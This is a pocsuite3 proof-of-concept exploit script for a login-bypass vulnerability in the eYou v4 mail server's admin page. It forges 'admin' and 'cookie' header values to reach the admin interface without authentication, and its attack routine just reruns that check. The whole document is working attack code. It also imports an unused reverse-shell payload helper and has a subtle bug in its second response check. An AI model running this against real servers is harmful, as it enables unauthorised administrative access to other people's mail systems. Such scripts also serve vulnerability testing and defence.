eYou v4 /grad/admin/admin_maincontent.php 登录绕过漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout class DemoPOC(POCBase): vulID = '1300' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014­-04-­25' createDate = '2014-05-08' updateDate = '2014-05-08' references = ['http://wooyun.org/bugs/wooyun-2014-058462'] name = 'eYou v4 /grad/admin/admin_maincontent.php 登录绕过漏洞 POC' appPowerLink = 'http://www.eyou.com/' appName = 'Eyou' appVersion = 'V4#' vulType = 'Login Bypass' desc = ''' eYou v4 grad/admin/admin_maincontent.php文件存在漏洞，可绕过登陆验证进行用户管理等操作 ''' samples = [] install_requires = [''] def _verify(self): result = {} url = self.url + '/grad/admin/admin_maincontent.php' request = requests.get(url) content = request.text if 'action="/admin/show_msg.php" method="POST" name=' \ '"show_message" id="show_message">' in content: headers_fake = {} headers_fake['Cookie'] = 'admin=1111111111111; cookie=1111111111111' content = requests.get(url, headers = headers_fake) if 'rel="stylesheet" href="/skins/current/css/eyo' \ 'u.css"' in content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() register_poc(DemoPOC)